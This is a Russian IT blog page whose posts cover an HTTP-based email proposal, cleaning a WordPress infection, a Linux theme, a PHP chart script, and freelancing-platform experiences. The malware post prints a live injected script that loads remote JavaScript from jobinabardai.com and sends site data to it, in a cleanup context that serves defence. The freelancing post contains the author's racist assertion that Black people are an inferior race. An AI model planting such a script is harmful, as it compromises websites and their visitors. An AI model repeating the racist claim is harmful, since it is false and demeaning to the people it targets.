MiniDevicesTop ИТ блоги 2024-05-18 2024-05-18 Отображаются все разделы
123456

root
0

Информационная безопасность
Tweaks
Работа
Новые разработки
Почта


Без комментариев
О замене существующих электронных почтовых систем, или "http vs smtp smtps imap pop pop3 и их модификаций"

Очень часто мне приходится сталкиваться с проблемами клиентской почты. Кто-то почту не отсылает, кто-то не принимает, чья-то почта попадает в спам, кто-то не может подключиться к серверу, у кого-то спамят, кто-то не может получить список своих папок во входящих. В общем проблем более чем много.



Чем больше я работаю с почтой, тем виднее становится причина такого количества проблем: отсутствие унификации. Отсутствие от слова "совсем". Многие возразят словами "протокол SMTP нужен, и он унифицирован" на что я отвечу, что дело не в протоколе SMTP, ибо он обеспечивает только передачу данных, но не обеспечивает дополнительных сервисов. Это как азбука морзе или бинарный код: с их помощью можно передать что угодно, даже картинку и видео, вопрос только во времени, удобстве, и количестве надстроек.

Но дело ведь не в передаче данных. Данные нужно хранить, данные нужно передавать, данные нужно обрабатывать, и существование трех протоколов (с их количеством безопасных и не очень портов) только для обмена данными - это чересчур как по мне. Чтобы вам было понятно, приведу пример: настройте мне систему, которая позволит мне читать почту, которую мне будут слать клиенты. При чем я не хочу пользоваться Outlook'ом и прочими клиентами, равно как не хочу пользоваться всякими Squirelmail или Roundcube. Я хочу просто читать свою почту. И отсылать ее. На настройку такой системы вы убьете ЧАС как минимум, и это если будете пользоваться настройками из коробки, установленными через apt-get/yum. А если после того как вы мне это сделаете, я попрошу добавить туда еще одного пользователя, из другого домена - вы убьете на это еще один час. И вряд ли сделаете.

Поэтому почтовая система нуждается в тотальной переработке. Устаревшие pop,smtp,imap давно себя изжили! А мякотка в том, что и придумывать-то ничего не нужно, нужно всего лишь отдать почту вебу.

В самом деле, что может быть проще, имея веб-сервер со своей веб-директорией для домена, иметь в ней еще и секретную папку ".mail" где будет храниться почта, которую туда сможет записать каждый (при наличии определенных условий, конечно), которая будет храниться в виде текстовых файлов, или даже HTML, доступ к которой сможет получить любое ваше приложение, а при наличии системы авторизации - извне тоже ?

Обмен информацией будет вестись при помощи всего лишь одного протокола - HTTP, который прост в семантике, универсален, существует на любом устройстве, и может обрабатываться даже скриптом на баше. Да, почтовая система на баше, вы правильно поняли.

Итак, плюсы возможного перевода почты на HTTP:

1. Простота установки. Для работы почтовой системы понадобится всего лишь веб-сервер, который и так устанавливается.

2. Простота обмена информацией. Для отсылки письма нужно всего лишь передать серверу POST-запрос, в котором будет просьба записи письма, необходимые реквизиты, само письмо, имя аккаунта, и вообще все что мы только захотим. Неизвестные параметры просто отсекутся.

3. Отсутствие необходимости настраивать несколько разных систем - релеев, серверов хранений, серверов отсылки, авторизаций, проверок на отправку, проверок на прием, DKIM, SPF, отдельные MX, и многого другого. Клиент (а это может быть браузер, отдельный клиент, скрипт, или кто угодно) просто передает домену адресата команду "отправляю вам письмо".

4. Следствие из третьего пункта - меньший шанс чему-то поломаться, вследствие чего сократится трата времени на настройку и фиксы.

5. Относительно легкий доступ к почте с возможностью ее просто прочитать, или скачать, или передать далее. Нет ничего проще текстовых или html файлов в определенной папке, читать которые можно каким угодно приложением.

6. Высокая скорость поиска, и вообще работы. Не будет смысла выкачивать всю почту и хранить ее локально на компьютере чтобы быстрее искать, либо ждать минутами, пока клиент найдет нужное вам содержимое по ключевым словам, выкачивая почту. HTTP весьма быстр и удобен.

7. Клиентам не придется извращаться, отправляя разного рода вложения в почту. Все вложения могут идти дополнительными файлами, главное письмо может содержать только ссылку-инклуд на них. Или вообще на внешний источник. Зачем ждать, пока вложение прикрепится, отошлется, потом ждать пока оно скачается, если вашему адресату его можно передать прямо с вашего компьютера ?

8. Простая система хранения. Все хранится в одной папке - .mail, которая лежит в корневой папке домена. Это все. Все письма и настройки, хранятся в этой папке, не придется больше шариться по конфигам sendmail, exim4, postfix, dovecot, привязывать базы данных MySQL, ковыряться с настройками доступа.

9. Вытекающая из предыдущего пункта возможность легкой миграции почты с одного сервера на другой. Заархивировал директорию на одном сервере, разархивировал на другом. Это все. Кстати не лишним было бы предусмотреть миграцию в самой реализации сервера, по типу кнопки "Добавить мою старую почту". Это удобно.

10. Усовершенствованная возможность борьбы со спамом и использованием чужих серверов для спама. Поскольку все будет делаться в пределах сервера адресата, он сам будет бороться со спамом путем разных проверок. 

11. Поддержка плагинов. Нет ничего проще, чем разместить в папке .mail, ваш собственный скрипт, который будет обрабатывать почту так как вам нужно.

12. Удобная диагностика. В отличие от существующей системы, сервер может отвечать клиенту на лету о статусе почтового сообщения, было ли оно принято, было ли оно прочитано, по какой причине не принято, и так далее.


Проект стартовал


 Здесь я буду перечислять основные фичи. Черновик.


Авторизация при отправке письма

Есть очень легкий, универсальный способ авторизации, который плюс к тому же позволит эффективно бороться со спаммерами и флудерами - токен.

Давайте представим, что мы хотим отослать письмо с нашего адреса "admin@noname.com" на почту "vasya@microsoft.com". Процесс будет выглядеть так: a) Наш клиент авторизуется логином и паролем на сервере noname.com, при чем через обычный POST-запрос; б) Сервер noname.com генерирует токен, который сохраняет у себя в базе и отдает нашему клиенту; в) Наш клиент при помощи того же POST-запроса, шлет серверу microsoft.com письмо с текстом самого письма и токеном; г) Сервер microsoft.com отсылает серверу noname.com вопрос, создавал ли он такой токен, в случае положительного ответа, письмо сохраняется, в случае отрицательного - адресат помещается в спам-лист.

Реализация функционала авторизации на PHP (самом популярном языке) займет 10 строчек на каждом из серверов. Метод работы просто и понятен. Чем-то напоминает "подтверждение регистрации по почте". В обмене информацией используется один протокол HTTP, и три запроса, отправитель->сервер отправителя, отправитель->адресат, адресат->сервер отправителя. Все просто и понятно.




Статья будет периодически дополняться, так что добро пожаловать!


root
7

Информационная безопасность
JavaScript
PHP
Фриланс
Работа


Без комментариев
Wordpress malware, вирус, jquery.min.php и все что с этим связано

Как-то связался со мной очередной клиент, пожаловался мне что его забанил хостер за "malware".

Хостер как и полагается, оказался шаред, а самое прикольное что эти дебилы умудрились отключить пользователю SSH, мотивируя это "ограничением аккаунта". Это все равно что сказать "Уважаемый клиент, мы обнаружили у вас вирус, поэтому доступ к клавиатуре будет закрыт, пока вы не вылечитесь от вируса". Ну да ладно.

Анализируя контент клиента, я понял что он использует недоCMS под названием Wordpress. Тогда не удивительно и вполне себе предсказуемо.

Полазив еще немного по контенту, я нашел код этого malware:

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0document.referrer!==undefineddocument.referrer!==''document.referrer!==null){document.write('<script type="text/javascript" src="http://jobinabardai.com/js/jquery.min.php?c_utt=I92930&c_utm='+encodeURIComponent('http://jobinabardai.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>


Ничего как бы страшного он не делает, расшифровать и понять это под силу даже школьнику, однако хостеры иного мнения, и банят за наличие такой штуки. Дальнейший поверхностный анализ показал, что заражается исключительно файл "header.php" всех тем, доступных в папке /wp-content/themes. Не обошлось без минутки юмора:


Два одинаковых малваря в одном и том же файле. Определенно писал школьник, почему-то считающий что в скрипте может быть только один закрывающий тег </head> 


К счастью рецепт излечения прост: редактируем файл и просто удаляем из него эту строчку. Чтобы воспрепятствовать дальнейшему заражению (а оно будет, если вы не смените пароли/хостера/страну) - всего лишь поставьте права r-xr-xr-x (555) на файл header.php

Кто не помнит как это делается, напоминаю: chmod 555 header.php, а еще лучше chmod 555 `find -name 'header.php'` от корня - это поставит необходимые права доступа ВСЕМ файлам, найденным у вас в папке. Разумеется, если у вас Linux-хостинг, и вы имеете доступ к SSH, хотя бы ограниченно-клиентского уровня.


Судя по количеству подкаталогов у моего клиента, количеству Wordpress-копий, и количеству зараженных файлов - заражение велось либо через что-то очень забагованное внутри Wordpress (и это не тема, они были разными), либо рекурсивно через консоль и при участии/бездействии хостера.

Мораль сего рассказа такова: дешевый VPS стоит 5 баксов, и я считаю что это приемлемая цена за отсутствие такого геморроя, тем более что плюсов намного больше.


Удачного лечения.



root
1

Linux Ubuntu
Linux ElementaryOS
Tweaks


Без комментариев
Elementary OS Yosemite theme

Существует много тем для Elementary OS и Cinnamon, косящих под Yosemite \ Lion.

Все они выглядят убого, поскольку где-то все равно содержат нестыковки по цветам, вследствие чего выглядят как "нечто одно, к чему прицепили нечто другое". Мне стало скучно, и я решил помочь сообществу, запилив нормальную тему, свободную от недостатков существующих. Хорошие теплые цвета, унифицированная расцветка для GTK2, GTK3, Metacity придают приложениям современный пристойный вид, независимо от того, что это за приложение: synaptic, firefox, панель управления, или всплывающее окно.


1) Скачиваем здесь: http://pretty.biz.ua/proxy/elementary-yo.zip

2) Распаковываем

3) С пользователя "root" копируем распакованную директорию в /usr/share/themes

4) Наслаждаемся после перезапуска



 






root
0

PHP
Tweaks
Фриланс


Без комментариев
Простой график на PHP и HTML

Делая один интересный проект для клиента с фриланса, натолкнулся на задачу создать диаграмму для медленных запросов MySQL, и решил поделиться, может кому-то пригодится.

Забегая вперед, покажу картинку что у нас должно получиться в итоге...


Приведу краткий скрипт, который рисует такое чудо:

<?php

 function rrange ($val, $v1, $v2)
  {
    if (($val >= $v1) and ($val < $v2))
      {
        return TRUE;
      }
    else
      {
        return FALSE;
      }
  }
 
 function drawdiv ($val)

  {
// Запускаем цикл от одного, до значения колонки. Затем в зависимости от текущего значения переменной цикла, будем подставлять цвета
    for ($i = 1; $i < $val; $i++)
      {
        if (rrange($i, 0, 2))
          {
            $col = "#00aa00";
          }
        if (rrange($i, 2, 4))
          {
            $col = "#00bb00";
          }
        if (rrange($i, 4, 6))
          {
            $col = "#00dd00";
          }
        if (rrange($i, 6, 8))
          {
            $col = "#88dd00";
          }
        if (rrange($i, 8, 10))
          {
            $col = "#bbdd00";
          }
        if (rrange($i, 10, 12))
          {
            $col = "#dddd00";
          }
        if (rrange($i, 12, 14))
          {
            $col = "#eedd00";
          }
        if (rrange($i, 14, 16))
          {
            $col = "#ffdd00";
          }
        if (rrange($i, 16, 20))
          {
            $col = "#ffcc00";
          }
        if (rrange($i, 20, 24))
          {
            $col = "#ffbb00";
          }
        if (rrange($i, 24, 28))
          {
            $col = "#ffaa00";
          }
        if (rrange($i, 28, 32))
          {
            $col = "#ff9900";
          }
        if (rrange($i, 32, 50))
          {
            $col = "#ff8800";
          }
        if (rrange($i, 50, 100))
          {
            $col = "#ff7700";
          }
        if (rrange($i, 100, 150))
          {
            $col = "#ff6600";
          }
        if (rrange($i, 150, 200))
          {
            $col = "#ff5500";
          }
        if (rrange($i, 200, 250))
          {
            $col = "#ff3300";
          }
        if (rrange($i, 250, 1300))
          {
            $col = "#ff0000";
          }
        $h = $i * 3;
        // Рисуем квадратик
        echo "<div style='box-shadow: 0 0 10px $col;position: absolute; width: 3px; height: 2px; background-color: $col; bottom: $h" . "px;'></div>";
      }
  }
// Рисуем обрамляющий div  
echo "<div style='width: 1000px; height: 602px; vertical-align: bottom; position: relative; overflow: auto; border-left: 1px solid #aaa;'>";
$x=0;
 for ($i = 1; $i <= 150; $i++)
      {
            $x = $x + 5;
           // Рисуем собственно вертикальную колонку шириной в 4 пикс, и с шагом каждые 5 пикс
           echo "<div style='background: none;left: $x" . "px; position: absolute; bottom:0; float: left; width: 4px; height: 600px;'>";
           // Заполняем ее красивыми разноцветными квадратиками, генерируя значения на лету. Чем выше значение - тем краснее квадратик
           drawdiv(rand(3,200));
           echo "</div>";
      
      }
echo "</div>";
?>

 

Как видите, ничего сложного нет, скрипт не использует ни одну экзотическую библиотеку, выводя все средствами HTML и CSS. И может быть оптимизирован, если вы обладаете знаниями PHP чуть выше меня 


Удачного вам программирования!



root
0

Информационная безопасность
Фриланс
Работа
Upwork
Freelance.com


2 комментариев
Upwork vs Freelancer.com - за и против

Когда-то давным давно, мой бывший коллега Юрий пришел на работу с гордой новостью: он зарегистрировался на сайте Odesk. Тогда еще я не слышал о таком, но после краткого рассказа Юрия и моего чтения в Google, я понял что это.

Юрий обращал внимание на то, что он сдал там "некоторые тесты". Тесты - это набор вопросов на время, показывающий в твоем профиле твою квалификацию как фрилансера. Очередная "фаллометрия", короче говоря. Вызов Юрия я принял, и в первый же вечер, завел себе анкету, и сдал несколько тестов. 

Это меня затянуло, и я попробовал попытать счастья. Несколько раз мою анкету не принимали, что-то им не нравилось, и методом тотального штурма онлайн-техподдержки, шаг за шагом я корректировал анкету до победного конца. Последняя причина была вообще маразматической - надпись "Toshiba" на фотке в профиле, где я сижу за ноутбуком. Маразм конечно, однако правила есть правила, да и монастырь чужой, посему фотографию пришлось обрезать.


Несколько первых заданий пришлось сделать за дешево, для создания репутации. Следующее задание показалось мне очень вкусным, 200 долларов за сайт для спортивной организации, Греция. После детального объяснения с греком, что и к чему, мне понадобилась неделя, чтобы написать этот сайт с нуля. Что я и сделал, грек остался доволен, и передал мне 200 долларов.


Однако не прошло и пары дней, как мой аккаунт оказался забанен. На попытки выяснить, ПОЧЕМУ, идиотский саппорт Одеска отмораживался "policy violation, please wait", а поскольку полиси виолейшн - это дела секьюрити-департмента, где работает 1.5 человека, то между ответами в тикете нередко проходило два или три дня. Меня зачем-то заставили верифицироваться выписками с банков на фоне меня, попросили переписку с клиентом, и еще какие-то гадости. Спустя три недели, все таки разбанили и сообщили причину: проблемы с клиентом. Судя по всему, этот махинатор оплатил мою работу с паленной (или нет) кредитки, потом хозяин кредитки запросил возврат платежа и банк настучал Одеску о махинации. Кстати вывод денег я обустроил при помощи других махинаторов, называющих себя Payoneer - это такая платежная система в США с одним счетом на всех, которая выпускает банковские пластиковые карты и принимает в себя оплату с фрилансовых систем. Поскольку формально они не считаются банком, то украинец владеющий этой картой, не нарушает законодательство Украины, запрещающее иметь незадекларированный счет в иностранном банке. Совсем как история с Коломойским: "- Игорь Валерьевич, у нас двойное гражданство запрещено! - А у меня тройное гражданство, так что закон я не нарушаю". Все знают что это неправильно, но ведь в законе четко прописано чего нельзя, а значит мы с Коломойским не нарушаем закон :)


Проходили дни, и в принципе лениво сидя по часу в день, можно было зарабатывать дополнительно 200 долларов в месяц, что в свете украинского курса давало неплохие деньги в гривне. Купил холодильную камеру, ноутбук, и еще много много вкусных вещей. Однако со временем стало надоедать, поскольку в то время зарплата была фиксированная в 1000 долл, и лишние две сотни на этом фоне смотрелись невзрачно.


И вот недавно появился повод опять туда вернуться. Теперь эта биржа стала называться Upwork, и там произошли изменения: появились какие-то коннекты, ухудшился интерфейс, появился фаллометр.

Фаллометр, называемый "Job success" - показывает твой процент успешности фрилансера. Как он считается - одному богу известно. Индус, сделавший два задания и получивший по пять звездочек за каждое, может иметь 100% Job success, а человек который отработал около сотни часов, сделав 30 заданий - может иметь 75%, как я. И нигде не написана дескрипция, ну там например "От вас часто отказываются клиенты, улучшите порфтолио". Да и совершенно глупое нововведение, как по мне, лишь увеличившее пропасть между одними фрилансерами, и другими, поставив их в неравные условия. 

В бесплатной версии Upwork (а вы как думали, безработные люди, ищущие заработок, тоже должны платить, это суть капитализма) количество заявок ограничено в среднем до 30-ти. Это значит что вы можете подписаться только на 30 проектов, и счетчик сбрасывается только раз в месяц, как правило в конце. Эти 30 заявок можно израсходовать за 3 дня, и это еще не гарантия, что вас выберут: слишком много индусов, готовых за 10 баксов написать Гугл :) Есть и платная подписка: за 10 долларов в месяц, у вас будет целых 35 заявок, плюс вы сможете покупать возможность дополнительной заявки за один доллар. Разумеется эта гиблая идея была отвергнута сразу и моментально: кому платить я могу найти и в Украине, а мне бы заработать...

Не так давно я купился на интересное задание: клиент приложил syslog-файл. В файле видно, что сайт клиента DDoS'ят, используя одну багу Wordpress. Клиент ограничил максимальный потолок оплаты в 200 долларов, но я как честный фрилансер, взялся за 150, тем более что задание относительно легкое. Клиент мне написал, даже дал доступ к своему серверу через SSH. Работа была закончена спустя полчаса, за это время сервер один раз кто-то перезагрузил помимо меня, и удалил директорию с сайтом. Я написал об этом клиенту, клиент "поменял пароли", и восстановил сайт из бэкапа. Соответственно работу пришлось делать заново, благо как ее делать - я запомнил, и во второй раз сделал за 2 минуты. И тут началось...

"Мой сайт криво работает, в админку не логинится" - кричал клиент. Я клиенту ответил, что первоначальный запрос был на тему "избавить сервер от DDoS'a, и что на этом сервере находится - я в душе не гребу". Кстати DDos заключался в бесконечном вызове /xmlrpc.php, соответственно чтобы избавиться от этого, необходимо было судя по форумам, просто заблокировать доступ к нему через .htaccess

Но клиент продолжал выносить мозг, и я глянул в .bash_history сервера. Как я и ожидал, какие-то перемещения, какие-то редактирования тем, в общем с сервером работал еще кто-то помимо меня. После восстановления опять из бэкапа и фикса уязвимости мы вроде как пришли к общему знаменателю и попрощались. 

Завтрашнее утро я встретил словами клиента "Сайт опять не работает", и через 10 минут другими словами "Я не могу долго ждать и взял другого фрилансера". Я разумеется, с уважением к нему, скинул ему опять историю сервера и свое объяснение тому что у него происходит, но пообещал открыть диспут (спор) по этому поводу.

Спор я все же не открывал, это может отразиться на рейтинге, а репутация мне покамест дороже чем 150 долларов.

И вот недавно мне приходит письмо: ваш аккаунт заблокирован, и ссылка на тикет. Цитирую тикет дословно: "We have received a complaint from a client stating that you have vandalized their property, and they have provided sufficient evidence to support their claim". Мы получили жалобу от клиента, который говорит что вы "свандалировали" его собственность, и клиент предоставил этому доказательства. Я разумеется, сразу понял, в чем дело, и чья была жалоба. Не хочу показаться расистом, но мой горе-клиент был негром, и я лишний раз убедился в том, что НЕ ЗРЯ негров считают немного неполноценной расой. Само собой, я приложил в тикет скриншоты нашей с негром переписки, красными буквами показал, где я ему писал что на его сервере кто-то сидит кроме меня, показал красными буквами где он с этим согласился, показал красными буквами где он согласился что работа выполнена, короче предоставил полные доказательства того, что он меня оклеветал.

На момент написания этих слов, прошло три дня с момента моего ответа в тикет. До сих пор в ожидании, и это еще одна причина, по которой сайт upwork.com - дерьмо.

И вот спустя 8 дней после первоначального открытия тикета и моих оправданий - мой аккаунт разбанили и предупредили что "надеемся что это ваше последнее нарушение". В целях безопасности, быстро вывел свои заработанные 145 долларов, от греха подальше. Недовольство заключается в том, что сайт берет 10% от заработанных денег (т.е. с 1000 реальных долларов я получил бы 900), 2 доллара за обналичивание, и это не считая сервисных услуг. За такие деньги, можно было нанять вменяемый техсаппорт с хорошей реакцией. 8 дней - это слишком.


Разница в затратах и выводе денег с Upwork и Freelance.com.

Оба сайта используют так называемые "заявки" - это количество возможностей подписаться на определенное количество задач, по идее выдуманное чтобы лимитировать спам, но мы-то с вами знаем что истинная цель - состричь денег с тех, кто хочет работать. Итак, на количество доступных заявок, влияет "тариф" - т.е. подписка. Начальный уровень подписки - бесплатный, и за сумму 0, мы получаем 30 заявок в месяц на Upwork, и 8 заявок в месяц на Freelance.com. Смешно, да ? А на самом деле - нет. Что 30 заявок, что 8 заявок - это мало, потому-что отосланная заявка не является гарантией того что ее примут, а отменив заявку вручную - их лимит не пополняется, т.е. ждать до конца месяца все-равно придется. Поэтому, в действие вступает платная подписка, а здесь все намного интереснее: следующий тариф на Upwork - аж 35 заявок за 10 долларов в месяц, независимо от того, заработали мы денег или нет, ответили на наши заявки, или нет. На Freelancer следующий после бесплатного тариф - 15 заявок за доллар. Оба варианта звучат просто смешно, платить стабильно 10 долларов за возможность подать на 5 заявок больше никто не будет, и это - яркий пример управления "эффективным менеджментом", который понятия не имеет об анализе. Зато следующий тариф на Freelancer - 80 заявок за 5 долларов. Вот это золотая середина, и в принципе обсуждать Upwork после этого уже смысла нет, сами понимаете.


Система подачи заявок тоже немного различается. На обеих сайтах фрилансер подает заявку, которую клиент должен подтвердить (взять вас в работу) после непродолжительного общения, или вовсе без него. На Upwork это бесплатно, а вот на Freelancer.com в момент подтверждения клиентом, с вас списывается сумма равная 10% от цены заявки, но не ниже 5 долларов, и это есть глупо. Во-первых, нельзя брать процент с денег которых нету, это вполне логично. Во-вторых, клиент деньги может и не заплатить по разным причинам, начиная от банального кидка, и заканчивая форс-мажорным отключением интернета. Огромный минус как по мне. Upwork берет те же самые 10%, но только после фактической оплаты финансами. Это плюс.


Вывод денег обеими системами производится практически одинаково - те же банки Америки, тот же Payoneer, разница лишь в комиссиях. На Upwork, выводя непосредственно на банковский счет - платится комиссия 30 долл. То есть таким образом выгодно выводить суммы от 2000 долл и выше, чтобы этими 30 долларами и махинациями банка с валютой, перекрыть недостатки следующего способа. Freelancer кажется выводит бесплатно, но только в банки США. Следующий способ - карточка Payoneer, вывод на которую производится с комиссией 2 доллара за каждый вывод в случае Upwork, и бесплатно в случае Freelancer.com. Вроде бы очевидно преимущество Freelancer, однако не все так просто: Upwork выводит в любое удобное для вас время, а вот Freelancer - два раза в неделю по такой схеме: запросы на вывод, сформированные до вечера среды - процессятся в ночь с четверга на пятницу. А запросы сформированные до вечера воскресенья - процессятся в ночь с понедельника на вторник. И здесь есть еще один подводный камень: если выводить полную сумму, и после момента вывода взять в обработку клиента - вывод может не произойти, поскольку сумма на балансе уменьшилась. А поменять ее можно только до крайнего лимита времени. То есть если вы заработали 400 долларов, в среду сформировали заявку на вывод, а в четверг нашли клиента, то у вас два варианта - лишиться денег в пятницу, просто взяв клиента и уменьшив сумму на балансе, либо исправив заявку на вывод, но в таком случае деньги будут аж в ночь с понедельника на вторник. Поэтому я рекомендую выводить, оставляя на балансе хотя бы 10 долларов на всякий случай. Либо не брать работу в этом промежутке, что не есть тру, ибо работа может быть вкусной. Кстати, на балансе возможно отрицательное число, т.е. если у вас будет ноль, и вы возьмете кого-то в работу, то у вас будет -5 долларов (минимум) аж до тех пор пока клиент вам не переведет деньги.


01.03.2017

Прошел уже год моей работы на сайте Freelancer.com. За этот год было заработано чуть более 18 000 долларов, что очень неплохо, учитывая временные затраты порядка 4-5 часов в день. 

За первые полгода работы, набилась клиентская база. Клиентов старался выбирать с запада, то есть никаких индусов, пакистанцев, арабов и вьетнамцев. Зачастую рисковал деньгами, в том плане что сначала делал работу, только затем подтверждал проект, что было абсолютно безопасно в смысле рейтинга, но было опасно в случае денег. Пару раз даже кидали, но эти несчастные 30 долларов намного дешевле чем потерянный рейтинг, а ведь взяв проект в оборот, я по-любому получу отзыв, а положительный или отрицательный - зависит от хода работы.

В основном специализировался на лечении серверов и сайтов от вирусни, миграции доменов и почты, а так же оптимизации сайтов\серверов. Хотя периодчески всплывали абсолютно диаметрально разные по содержанию задачи: от моргания светодиодами на Raspberry Pi и до восстановления MySQL InnoDB-баз данных.

Спустя полугода у меня появился неплохой друг из Нидерландов, с которым мы в принципе работаем чуть ли не в товарный кредит: то есть он пишет мне в скайп, я ему помогаю, завтра-послезавтра помогаю опять, а через неделю он раздупляется и платит триста баксов за сделанное ранее, и с авансом на то что буду делать для него потом. 

Появился хороший долгий проект, приносящий около 200-300 долларов в месяц: контора у которой штук десять шаред-серверов с Cpanel. С ними у меня почасовая тарификация, основная задача - лечение от вирусни и восстановление покоцанных вирусней сайтов. Иногда просят что-то другое.

Есть еще парочку почасовых бесконечных проектов, суммарно приносящих около 100 долларов в месяц. Это обслуживание серверов. Раз в месяц проверяю на вирусы. 

Помимо постоянных проектов (они у меня оформлены на бирже как hourly), есть еще куча клиентов, которые периодически ко мне обращаются. Работая только с постоянными клиентами, и используя фриланс только как средство оплаты - у меня выходит в среднем 800-1000 долларов в месяц. Без активного поиска и подписывания на новые задачи от новых клиентов.

Что касается стабильности, за этот год я могу сказать следующее: в самом ленивом месяце, когда мне было реально влом работать, у меня вышло 800 долларов, благодаря постоянному клиенту. Без него, получилось бы 500. Это - работая час в день. Это - неохотно отвечая на инвайты (приглашения по инициативе клиентов). Бывали недели, когда совсем глухо. Эти недели сменялись другими, когда задница реально горела. Но так, чтобы было меньше восьми сотен - не было ни разу.


Что я нашел плохого на этом сайте за это время.

Во-первых, дебильноватая система оплаты комиссии в момент подписывания на проект, а не оплаты. То есть формально клиент может отморозиться, и вы мало того что не получите свои деньги, а и потеряете свои собственные на комиссию. За весь год у меня было такое всего несколько раз.

Во-вторых, возможность оставить отзыв после диспута. С точки зрения психологии это не совсем правильно. Ведь посудите сами: клиент получил работу, ленится заплатить, тут ему приходит диспут, само собой ему приходится с ним согласиться, но вот отзыв он ухудшит, хотя бы из чувства мести.

В-третьих, и это самое нехорошее, несмотря на все заверения и кукареку-гарантии, Freelancer.com не гарантирует вам сохранность ваших денег по вине ваших клиентов. Расскажу на примере. Работал с клиентом. Нормальный чувак. Работу сделали, лапки пожали, отзывами поменялись, бабло перевели. Через несколько месяцев приходит письмо "бабло locked due to external dispute". Потрепался с службой техподдержки. Оказалось что у этого клиента проблемы с аккаунтом. То ли адрес чужой назвал, то ли фамилию. Потерянная сумма - 90 евро, само собой с комиссией. Казалось бы, Freelancer.com - биржа, и это их проблемы, как они верифицируют клиента. Но нет. Им плевать. Так что, при любой возможности получить от клиента оплату через другие способы - этим стоит воспользоваться.

В-четвертых, оказывается диспут можно открыть даже после оставления отзывов, что есть абсурдный бред. Представьте себе, что вы помогли клиенту перенести сайт на новый хостинг. Все отлично, все работает, деньги переведены, отзывы получены. Через пару дней хостинг банит клиента за спам, клиент открывает диспут что сайт был криво смигрирован, техподдержка становится на сторону клиента. Круто, че.


...продолжение следует

Посмотрите так же: Тонкая настройка и компиляция ядра Linux _ и Wordpress malware, вирус, jquery.min.php и все что с этим связано _


Вы должны войти в систему, чтобы создавать блоги

3+3 / 3+2
В этой строке мы предупреждаем Вас, что можем использовать так называемые cookies
Нам искренне плевать на введенную Вами информацию о себе. Мы просто запоминаем у Вас на устройстве то, что Вы же и настроили.